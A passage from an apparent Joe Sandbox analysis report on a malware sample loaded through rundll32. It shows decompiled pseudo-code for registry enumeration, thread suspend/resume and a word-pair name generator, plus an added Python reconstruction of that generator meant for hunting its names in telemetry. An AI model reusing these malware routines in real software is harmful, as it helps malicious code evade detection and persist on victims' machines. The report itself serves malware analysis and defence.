                          									E010074B6( *_t43, _t91, _a8,  *0x100a3d0, _a16); // executed
                          								}
                          								if( *_t101 != 0) {
                          									E01006C2C(_a24);
                          								} else {
                          									 *_t101 = _a16;
                          								}
                          							}
                          						}
                          						goto L27;
                          					}
                          					_t21 = _t101 + 0x10; // 0x3d010090, executed
                          					_t81 = E010012CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                          					if(_t81 == 0) {
                          						_t100 = _v16;
                          						if(_v12 == 0x28) {
                          							 *_t100 =  *_t100 & _t81;
                          							_t26 = _t101 + 0x10; // 0x3d010090
                          							E01004822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                          						}
                          						E01006C2C(_t100);
                          						_t98 = _a16;
                          					}
                          					E01006C2C(_a24);
                          					goto L14;
                          				}
                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                          					goto L29;
                          				} else {
                          					_t97 = _a8;
                          					E01007A1E(_t98, _a8,  &_v284);
                          					__imp__(_t102 + _t98 - 0x117,  *0x100a3dc);
                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                          					_t91 = 0x80000003;
                          					goto L6;
                          				}
                          			}
                          0x01003472
                          0x0100347b
                          0x01003482
                          0x01003487
                          0x010034f4
                          0x010034fa
                          0x010034ff
                          0x01003506
                          0x0100350b
                          0x01003510
                          0x0100367b
                          0x01003682
                          0x01003682
                          0x01003687
                          0x01003689
                          0x01003689
                          0x01003692
                          0x01003692
                          0x01003516
                          0x0100351b
                          0x01003522
                          0x01003671
                          0x01003674
                          0x00000000
                          0x01003674
                          0x01003528
                          0x0100352d
                          0x01003530
                          0x01003535
                          0x0100353a
                          0x01003583
                          0x01003583
                          0x01003596
                          0x01003599
                          0x010035a0
                          0x010035a6
                          0x010035ad
                          0x010035b7
                          0x010035b7
                          0x010035af
                          0x010035af
                          0x010035af
                          0x010035af
                          0x010035d9
                          0x010035e1
                          0x0100360f
                          0x01003614
                          0x0100361b
                          0x01003620
                          0x01003624
                          0x01003656
                          0x01003626
                          0x01003633
                          0x01003636
                          0x01003646
                          0x01003649
                          0x0100364f
                          0x0100364f
                          0x010035e3
                          0x010035f0
                          0x010035f3
                          0x01003605
                          0x01003608
                          0x01003608
                          0x01003660
                          0x0100366c
                          0x01003662
                          0x01003665
                          0x01003665
                          0x01003660
                          0x010035d9
                          0x00000000
                          0x010035a0
                          0x01003549
                          0x0100354c
                          0x01003553
                          0x01003559
                          0x0100355c
                          0x0100355e
                          0x0100356a
                          0x0100356d
                          0x0100356d
                          0x01003573
                          0x01003578
                          0x01003578
                          0x0100357e
                          0x00000000
                          0x0100357e
                          0x0100348c
                          0x00000000
                          0x010034b3
                          0x010034b3
                          0x010034bf
                          0x010034d2
                          0x010034d8
                          0x010034e0
                          0x00000000
                          0x010034e0

                          APIs
                          • StrChrA.SHLWAPI(01007168,0000005F,00000000,00000000,00000104), ref: 010034A5
                          • lstrcpy.KERNEL32(?,?), ref: 010034D2
                            • Part of subcall function 010061FC: lstrlen.KERNEL32(?,00000000,05299D70,00000000,010039E8,05299F93,69B25F44,?,?,?,?,69B25F44,00000005,0100A00C,4D283A53,?), ref: 01006203
                            • Part of subcall function 010061FC: mbstowcs.NTDLL ref: 0100622C
                            • Part of subcall function 010061FC: memset.NTDLL ref: 0100623E
                            • Part of subcall function 010074B6: lstrlenW.KERNEL32(?,?,?,0100363B,3D010090,80000002,01007168,01007283,74666F53,4D4C4B48,01007283,?,3D010090,80000002,01007168,?), ref: 010074DB
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • lstrcpy.KERNEL32(?,00000000), ref: 010034F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                          • String ID: ($\
                          • API String ID: 3924217599-1512714803
                          • Opcode ID: 8a48b3e654a89f087bfe3f827552ab611b99cd17cf920b9daec1232b38275b88
                          • Instruction ID: 61b4df907b1502eed80f1283c49020dfa59fc804b0b812bfb1ff3ad961093b2c
                          • Opcode Fuzzy Hash: 8a48b3e654a89f087bfe3f827552ab611b99cd17cf920b9daec1232b38275b88
                          • Instruction Fuzzy Hash: 24514E7150020AEFEF239F64DC40DEA7BB9FF08344F008564FA959A1A0DB76D925DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7ED35
                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 05B7EDBF
                          • WaitForSingleObject.KERNEL32(00000064), ref: 05B7EDCD
                          • SuspendThread.KERNEL32(?), ref: 05B7EDE0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                          • String ID: v
                          • API String ID: 3168247402-1801730948
                          • Opcode ID: 427b9f4c93f36b4500540695487a72ec120636649ef5d81f2da1cee97a3075a0
                          • Instruction ID: 2933def9f337f8e8faf8705f34a1f69743268c463215740d33d245daeb545053
                          • Opcode Fuzzy Hash: 427b9f4c93f36b4500540695487a72ec120636649ef5d81f2da1cee97a3075a0
                          • Instruction Fuzzy Hash: 24413971108305AFE721DF64C885D6BBBEAFF88710F144969F6A482160D731E914CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E010071B6(void* __ecx, intOrPtr _a4) {
                          				int* _v8;
                          				int _v12;
                          				int* _v16;
                          				int _v20;
                          				int* _v24;
                          				char* _v28;
                          				void* _v32;
                          				long _t33;
                          				char* _t35;
                          				long _t39;
                          				long _t42;
                          				intOrPtr _t47;
                          				void* _t51;
                          				long _t53;
                          
                          				_t51 = __ecx;
                          				_v8 = 0;
                          				_v16 = 0;
                          				_v12 = 0;
                          				_v24 = 0;
                          				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                          				_t53 = _t33;
                          				if(_t53 != 0) {
                          					L18:
                          					return _t53;
                          				}
                          				_t53 = 8;
                          				_t35 = E01006D63(0x104);
                          				_v28 = _t35;
                          				if(_t35 == 0) {
                          					L17:
                          					RegCloseKey(_v32); // executed
                          					goto L18;
                          				}
                          				_v20 = 0x104;
                          				do {
                          					_v16 = _v20;
                          					_v12 = 0x104;
                          					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                          					_t53 = _t39;
                          					if(_t53 != 0xea) {
                          						if(_t53 != 0) {
                          							L14:
                          							if(_t53 == 0x103) {
                          								_t53 = 0;
                          							}
                          							L16:
                          							E01006C2C(_v28);
                          							goto L17;
                          						}
                          						_t42 = E01003472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                          						_t53 = _t42;
                          						if(_t53 != 0) {
                          							goto L14;
                          						}
                          						goto L12;
                          					}
                          					if(_v12 <= 0x104) {
                          						if(_v16 <= _v20) {
                          							goto L16;
                          						}
                          						E01006C2C(_v24);
                          						_v20 = _v16;
                          						_t47 = E01006D63(_v16);
                          						_v24 = _t47;
                          						if(_t47 != 0) {
                          							L6:
                          							_t53 = 0;
                          							goto L12;
                          						}
                          						_t53 = 8;
                          						goto L16;
                          					}
                          					_v8 = _v8 + 1;
                          					goto L6;
                          					L12:
                          				} while (WaitForSingleObject( *0x100a30c, 0) == 0x102);
                          				goto L16;
                          			}
                          0x010071b6
                          0x010071d0
                          0x010071d3
                          0x010071d6
                          0x010071d9
                          0x010071dc
                          0x010071e2
                          0x010071e6
                          0x010072c0
                          0x010072c4
                          0x010072c4
                          0x010071ef
                          0x010071f6
                          0x010071fb
                          0x01007200
                          0x010072b5
                          0x010072b8
                          0x00000000
                          0x010072be
                          0x01007206
                          0x01007209
                          0x01007210
                          0x0100721a
                          0x01007223
                          0x01007229
                          0x01007231
                          0x01007269
                          0x010072a3
                          0x010072a9
                          0x010072ab
                          0x010072ab
                          0x010072ad
                          0x010072b0
                          0x00000000
                          0x010072b0
                          0x0100727e
                          0x01007283
                          0x01007287
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01007287
                          0x01007236
                          0x01007245
                          0x00000000
                          0x00000000
                          0x0100724a
                          0x01007253
                          0x01007256
                          0x0100725b
                          0x01007260
                          0x0100723b
                          0x0100723b
                          0x00000000
                          0x0100723b
                          0x01007264
                          0x00000000
                          0x01007264
                          0x01007238
                          0x00000000
                          0x01007289
                          0x01007296
                          0x00000000

                          APIs
                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01007168,?), ref: 010071DC
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • RegEnumKeyExA.KERNEL32(?,?,?,01007168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01007168), ref: 01007223
                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,01007168,?,01007168,?,?,?,?,?,01007168,?), ref: 01007290
                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01007168,?), ref: 010072B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                          • String ID: !s
                          • API String ID: 3664505660-1801701826
                          • Opcode ID: 00c7b518cc5c3611e5c0e3e1a4434b4597aae44be212126ff7b8f8c16c6f9958
                          • Instruction ID: 5542007e202ade8032accffe2c8ed87331306c6ebc5d9256e97c82c81aa152e5
                          • Opcode Fuzzy Hash: 00c7b518cc5c3611e5c0e3e1a4434b4597aae44be212126ff7b8f8c16c6f9958
                          • Instruction Fuzzy Hash: D4316971D0021AAFEF23AFA9DC849EEFFB9EB44700F104066F5D1B2191D2791A908B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E01003D2C(signed int __edx) {
                          				signed int _v8;
                          				long _v12;
                          				CHAR* _v16;
                          				long _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t21;
                          				CHAR* _t22;
                          				CHAR* _t25;
                          				intOrPtr _t26;
                          				void* _t27;
                          				void* _t31;
                          				void* _t32;
                          				CHAR* _t36;
                          				CHAR* _t42;
                          				CHAR* _t43;
                          				CHAR* _t44;
                          				void* _t49;
                          				void* _t51;
                          				signed char _t56;
                          				intOrPtr _t58;
                          				signed int _t59;
                          				void* _t63;
                          				CHAR* _t67;
                          				CHAR* _t68;
                          				char* _t69;
                          				void* _t70;
                          
                          				_t61 = __edx;
                          				_v20 = 0;
                          				_v8 = 0;
                          				_v12 = 0;
                          				_t21 = E01003CFD();
                          				if(_t21 != 0) {
                          					_t59 =  *0x100a2fc; // 0x4000000a
                          					_t55 = (_t59 & 0xf0000000) + _t21;
                          					 *0x100a2fc = (_t59 & 0xf0000000) + _t21;
                          				}
                          				_t22 =  *0x100a178(0, 2); // executed
                          				_v16 = _t22;
                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                          					_t25 = E0100389E( &_v8,  &_v20); // executed
                          					_t54 = _t25;
                          					_t26 =  *0x100a348; // 0x428d5a8
                          					if( *0x100a2fc > 5) {
                          						_t8 = _t26 + 0x100b5c5; // 0x4d283a53
                          						_t27 = _t8;
                          					} else {
                          						_t7 = _t26 + 0x100b9fd; // 0x44283a44
                          						_t27 = _t7;
                          					}
                          					E01006B80(_t27, _t27);
                          					_t31 = E010076BB(_t61,  &_v20,  &_v12); // executed
                          					if(_t31 == 0) {
                          						CloseHandle(_v20);
                          					}
                          					_t63 = 5;
                          					if(_t54 != _t63) {
                          						 *0x100a310 =  *0x100a310 ^ 0x81bbe65d;
                          						_t32 = E01006D63(0x60);
                          						 *0x100a3cc = _t32;
                          						__eflags = _t32;
                          						if(_t32 == 0) {
                          							_push(8);
                          							_pop(0);
                          						} else {
                          							memset(_t32, 0, 0x60);
                          							_t49 =  *0x100a3cc; // 0x52995b0
                          							_t70 = _t70 + 0xc;
                          							__imp__(_t49 + 0x40);
                          							_t51 =  *0x100a3cc; // 0x52995b0
                          							 *_t51 = 0x100b827;
                          						}
                          						_t54 = 0;
                          						__eflags = 0;
                          						if(0 == 0) {
                          							_t36 = RtlAllocateHeap( *0x100a2d8, 0, 0x43);
                          							 *0x100a368 = _t36;
                          							__eflags = _t36;
                          							if(_t36 == 0) {
                          								_push(8);
                          								_pop(0);
                          							} else {
                          								_t56 =  *0x100a2fc; // 0x4000000a
                          								_t61 = _t56 & 0x000000ff;
                          								_t58 =  *0x100a348; // 0x428d5a8
                          								_t13 = _t58 + 0x100b552; // 0x697a6f4d
                          								_t55 = _t13;
                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1009287);
                          							}
                          							_t54 = 0;
                          							__eflags = 0;
                          							if(0 == 0) {
                          								asm("sbb eax, eax");
                          								E01003365( ~_v8 &  *0x100a310, 0x100a00c); // executed
                          								_t42 = E01001645(0, _t55, _t63, 0x100a00c); // executed
                          								_t54 = _t42;
                          								__eflags = _t54;
                          								if(_t54 != 0) {
                          									goto L30;
                          								}
                          								_t43 = E01003981(); // executed
                          								__eflags = _t43;
                          								if(_t43 != 0) {
                          									__eflags = _v8;
                          									_t67 = _v12;
                          									if(_v8 != 0) {
                          										L29:
                          										_t44 = E0100661D(_t61, _t67, _v8); // executed
                          										_t54 = _t44;
                          										goto L30;
                          									}
                          									__eflags = _t67;
                          									if(__eflags == 0) {
                          										goto L30;
                          									}
                          									_t54 = E0100529C(__eflags,  &(_t67[4]));
                          									__eflags = _t54;
                          									if(_t54 == 0) {
                          										goto L30;
                          									}
                          									goto L29;
                          								}
                          								_t54 = 8;
                          							}
                          						}
                          					} else {
                          						_t68 = _v12;
                          						if(_t68 == 0) {
                          							L30:
                          							if(_v16 == 0 || _v16 == 1) {
                          								 *0x100a17c(); // executed
                          							}
                          							goto L34;
                          						}
                          						_t69 =  &(_t68[4]);
                          						do {
                          						} while (E01007928(_t63, _t69, 0, 1) == 0x4c7);
                          					}
                          					goto L30;
                          				} else {
                          					_t54 = _t22;
                          					L34:
                          					return _t54;
                          				}
                          			}
                          0x01003d2c
                          0x01003d36
                          0x01003d39
                          0x01003d3c
                          0x01003d3f
                          0x01003d46
                          0x01003d48
                          0x01003d54
                          0x01003d56
                          0x01003d56
                          0x01003d5f
                          0x01003d65
                          0x01003d6a
                          0x01003d84
                          0x01003d90
                          0x01003d92
                          0x01003d97
                          0x01003da1
                          0x01003da1
                          0x01003d99
                          0x01003d99
                          0x01003d99
                          0x01003d99
                          0x01003da8
                          0x01003db5
                          0x01003dbc
                          0x01003dc1
                          0x01003dc1
                          0x01003dca
                          0x01003dcd
                          0x01003df3
                          0x01003dff
                          0x01003e04
                          0x01003e09
                          0x01003e0b
                          0x01003e37
                          0x01003e39
                          0x01003e0d
                          0x01003e11
                          0x01003e16
                          0x01003e1b
                          0x01003e22
                          0x01003e28
                          0x01003e2d
                          0x01003e33
                          0x01003e3a
                          0x01003e3c
                          0x01003e3e
                          0x01003e4d
                          0x01003e53
                          0x01003e58
                          0x01003e5a
                          0x01003e8a
                          0x01003e8c
                          0x01003e5c
                          0x01003e5c
                          0x01003e62
                          0x01003e6f
                          0x01003e75
                          0x01003e75
                          0x01003e7d
                          0x01003e86
                          0x01003e8d
                          0x01003e8f
                          0x01003e91
                          0x01003e98
                          0x01003ea5
                          0x01003eaa
                          0x01003eaf
                          0x01003eb1
                          0x01003eb3
                          0x00000000
                          0x00000000
                          0x01003eb5
                          0x01003eba
                          0x01003ebc
                          0x01003ec3
                          0x01003ec7
                          0x01003eca
                          0x01003edf
                          0x01003ee3
                          0x01003ee8
                          0x00000000
                          0x01003ee8
                          0x01003ecc
                          0x01003ece
                          0x00000000
                          0x00000000
                          0x01003ed9
                          0x01003edb
                          0x01003edd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01003edd
                          0x01003ec0
                          0x01003ec0
                          0x01003e91
                          0x01003dcf
                          0x01003dcf
                          0x01003dd4
                          0x01003eea
                          0x01003eef
                          0x01003ef7
                          0x01003ef7
                          0x00000000
                          0x01003eef
                          0x01003dda
                          0x01003ddd
                          0x01003de7
                          0x01003dee
                          0x00000000
                          0x01003eff
                          0x01003eff
                          0x01003f02
                          0x01003f06
                          0x01003f06

                          APIs
                            • Part of subcall function 01003CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,01003D44,00000001), ref: 01003D0C
                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01003DC1
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • memset.NTDLL ref: 01003E11
                          • RtlInitializeCriticalSection.NTDLL(05299570), ref: 01003E22
                            • Part of subcall function 0100529C: memset.NTDLL ref: 010052B6
                            • Part of subcall function 0100529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 010052FC
                            • Part of subcall function 0100529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01005307
                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01003E4D
                          • wsprintfA.USER32 ref: 01003E7D
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                          • String ID:
                          • API String ID: 4246211962-0
                          • Opcode ID: 687ccc385b6714cf9a49418e42a2cdb9ef604c27618ff52eb3e4800adc3195d2
                          • Instruction ID: 3d2ad865c8c5f3e5f67b95f9b038363f2c61a6a36f611c84ca8ab7c6ae7ba67e
                          • Opcode Fuzzy Hash: 687ccc385b6714cf9a49418e42a2cdb9ef604c27618ff52eb3e4800adc3195d2
                          • Instruction Fuzzy Hash: 09519171B00315EFFB63EBA8DC88AAE37A8BB08700F0445B6E5C5DB1C5D6B699408B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 22%
                          			E010019E2(signed int __eax, signed int _a4, signed int _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				intOrPtr _t81;
                          				char _t83;
                          				signed int _t90;
                          				signed int _t97;
                          				signed int _t99;
                          				char _t101;
                          				unsigned int _t102;
                          				intOrPtr _t103;
                          				char* _t107;
                          				signed int _t110;
                          				signed int _t113;
                          				signed int _t118;
                          				signed int _t122;
                          				intOrPtr _t124;
                          
                          				_t102 = _a8;
                          				_t118 = 0;
                          				_v20 = __eax;
                          				_t122 = (_t102 >> 2) + 1;
                          				_v8 = 0;
                          				_a8 = 0;
                          				_t81 = E01006D63(_t122 << 2);
                          				_v16 = _t81;
                          				if(_t81 == 0) {
                          					_push(8);
                          					_pop(0);
                          					L37:
                          					return 0;
                          				}
                          				_t107 = _a4;
                          				_a4 = _t102;
                          				_t113 = 0;
                          				while(1) {
                          					_t83 =  *_t107;
                          					if(_t83 == 0) {
                          						break;
                          					}
                          					if(_t83 == 0xd || _t83 == 0xa) {
                          						if(_t118 != 0) {
                          							if(_t118 > _v8) {
                          								_v8 = _t118;
                          							}
                          							_a8 = _a8 + 1;
                          							_t118 = 0;
                          						}
                          						 *_t107 = 0;
                          						goto L16;
                          					} else {
                          						if(_t118 != 0) {
                          							L10:
                          							_t118 = _t118 + 1;
                          							L16:
                          							_t107 = _t107 + 1;
                          							_t15 =  &_a4;
                          							 *_t15 = _a4 - 1;
                          							if( *_t15 != 0) {
                          								continue;
                          							}
                          							break;
                          						}
                          						if(_t113 == _t122) {
                          							L21:
                          							if(_a8 <= 0x20) {
                          								_push(0xb);
                          								L34:
                          								_pop(0);
                          								L35:
                          								E01006C2C(_v16);
                          								goto L37;
                          							}
                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                          							_t103 = E01006D63((_v8 + _t24) * _a8 + 4);
                          							if(_t103 == 0) {
                          								_push(8);
                          								goto L34;
                          							}
                          							_t90 = _a8;
                          							_a4 = _a4 & 0x00000000;
                          							_v8 = _v8 & 0x00000000;
                          							_t124 = _t103 + _t90 * 4;
                          							if(_t90 <= 0) {
                          								L31:
                          								 *0x100a318 = _t103;
                          								goto L35;
                          							}
                          							do {
                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                          								_v12 = _v12 & 0x00000000;
                          								if(_a4 <= 0) {
                          									goto L30;
                          								} else {
                          									goto L26;
                          								}
                          								while(1) {
                          									L26:
                          									_t99 = _v12;
                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                          									if(_t99 == 0) {
                          										break;
                          									}
                          									_v12 = _v12 + 1;
                          									if(_v12 < _a4) {
                          										continue;
                          									}
                          									goto L30;
                          								}
                          								_v8 = _v8 - 1;
                          								L30:
                          								_t97 = _a4;
                          								_a4 = _a4 + 1;
                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                          								__imp__(_t124);
                          								_v8 = _v8 + 1;
                          								_t124 = _t124 + _t97 + 1;
                          							} while (_v8 < _a8);
                          							goto L31;
                          						}
                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                          						_t101 = _t83;
                          						if(_t83 - 0x61 <= 0x19) {
                          							_t101 = _t101 - 0x20;
                          						}
                          						 *_t107 = _t101;
                          						_t113 = _t113 + 1;
                          						goto L10;
                          					}
                          				}
                          				if(_t118 != 0) {
                          					if(_t118 > _v8) {
                          						_v8 = _t118;
                          					}
                          					_a8 = _a8 + 1;
                          				}
                          				goto L21;
                          			}

                          APIs
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01001ADF
                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 01001AF4
                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01001B0B
                          • lstrlen.KERNEL32(69B25F45), ref: 01001B2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                          • String ID:
                          • API String ID: 3214092121-3916222277
                          • Opcode ID: 86fbaf264daa4746934377e6dc30c314b255437818ca11299eb33d172e78284b
                          • Instruction ID: 443c1466c648442ba65302a63d95235a45f715d72abf7b17900fb0ce9f753d76
                          • Opcode Fuzzy Hash: 86fbaf264daa4746934377e6dc30c314b255437818ca11299eb33d172e78284b
                          • Instruction Fuzzy Hash: 5051A131A00608EFEB22CF99C4847EDBBF6FF45314F05809AE9999B281C771DA51CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

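The routine E010019E2 listed above is a word-list name generator: it splits its input buffer on CR/LF, upper-cases the first letter of each word (the 0x61..0x7a check), refuses lists of 32 words or fewer (the 0x20 comparison, error 0xb), and then builds one name per word by concatenating two words picked with a 32-bit linear congruential generator (multiplier 0x19660D, increment 0x3C6EF35F, seeded from EAX) via lstrcpy/lstrcat, rejecting entries that lstrcmp finds already in the table, which it finally stores at 0x100a318. The Python below is an added reconstruction written for this page, not code from the sample or from Joe Sandbox, so that the names the sample generates can be reproduced offline from its word list and seed. Because the decompilation is rated 22 %, two details are assumptions: the LCG outputs are treated as unsigned when reduced modulo the word count, and a duplicate name is retried rather than stored. The word list in the block is constructed for demonstration, not taken from the sample.

```python
"""Reconstruction of the word-pair name generator E010019E2 (added example).

Not the sample's code and not Joe Sandbox output: it follows the decompiled
listing on this page. Assumptions (decompilation quality 22 %): LCG outputs are
unsigned indices, and a duplicate name is retried instead of being stored.
"""
from typing import List, Optional

LCG_MULT = 0x19660D          # multiplier seen in the listing
LCG_INC = 0x3C6EF35F         # increment seen in the listing
MASK32 = 0xFFFFFFFF
MIN_WORDS = 33               # listing fails with 0xb when wordcount <= 0x20


def lcg_step(state: int) -> int:
    """One LCG step as in the listing: s = s * 0x19660D + 0x3C6EF35F (mod 2^32)."""
    return (state * LCG_MULT + LCG_INC) & MASK32


def parse_wordlist(buf: bytes) -> List[str]:
    """Split buf on CR/LF, capitalise each word's first ASCII letter, and cap the
    word count at (len(buf) >> 2) + 1, the size of the routine's pointer table."""
    max_words = (len(buf) >> 2) + 1
    words: List[str] = []
    for raw in buf.replace(b"\r", b"\n").split(b"\n"):
        if not raw:                        # empty segments are not counted
            continue
        if len(words) == max_words:        # listing jumps to L21 when the table is full
            break
        first = raw[0]
        if 0x61 <= first <= 0x7A:          # 'a'..'z' -> subtract 0x20
            raw = bytes([first - 0x20]) + raw[1:]
        words.append(raw.decode("latin-1"))
    return words


def generate_names(seed: int, wordlist: bytes,
                   max_attempts: int = 10_000) -> Optional[List[str]]:
    """Return the name table the routine stores at 0x100a318: one name per word,
    each the concatenation of two LCG-chosen words. None where the routine returns 0."""
    words = parse_wordlist(wordlist)
    n = len(words)
    if n < MIN_WORDS:
        return None
    state = seed & MASK32
    table: List[str] = []
    attempts = 0
    while len(table) < n and attempts < max_attempts:
        attempts += 1
        r1 = lcg_step(state)                       # first draw
        state = lcg_step(r1)                       # second draw, carried as the seed
        name = words[r1 % n] + words[state % n]    # lstrcpy + lstrcat
        if name in table:                          # lstrcmp loop over stored names
            continue                               # assumption: duplicate is retried
        table.append(name)
    return table if len(table) == n else None


if __name__ == "__main__":
    # Constructed demonstration word list, not data recovered from the sample.
    demo = b"\r\n".join(b"item%02d" % i for i in range(33))
    for name in generate_names(0, demo)[:5]:
        print(name)
```

To use it against the real sample, feed it the decrypted word list the loader passes in and the seed value it places in EAX (a per-host value in this family of code, which the listing does not reveal); the resulting names are the strings to hunt for in registry and file-system telemetry. The seed-0 case is deterministic: the first two LCG outputs are 0x3C6EF35F and 1196435762, so with 33 words the first name is word 13 followed by word 5.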
                          C-Code - Quality: 100%
                          			E0100498E(signed int _a4, signed int* _a8) {
                          				void* __ecx;
                          				void* __edi;
                          				signed int _t6;
                          				intOrPtr _t8;
                          				intOrPtr _t12;
                          				long _t14;
                          				void* _t18;
                          				WCHAR* _t19;
                          				long _t20;
                          				void* _t25;
                          				signed int* _t28;
                          				CHAR* _t30;
                          				long _t31;
                          				WCHAR** _t32;
                          
                          				_t6 =  *0x100a310; // 0xd448b889
                          				_t32 = _a4;
                          				_a4 = _t6 ^ 0x109a6410;
                          				_t8 =  *0x100a348; // 0x428d5a8
                          				_t3 = _t8 + 0x100b87a; // 0x61636f4c
                          				_t25 = 0;
                          				_t30 = E010011C3(_t3, 1);
                          				if(_t30 != 0) {
                          					_t25 = CreateEventA(0x100a34c, 1, 0, _t30);
                          					E01006C2C(_t30);
                          				}
                          				_t12 =  *0x100a2fc; // 0x4000000a
                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                          					L12:
                          					_t28 = _a8;
                          					if(_t28 != 0) {
                          						 *_t28 =  *_t28 | 0x00000001;
                          					}
                          					_t14 = E0100402A(_t32, 0); // executed
                          					_t31 = _t14;
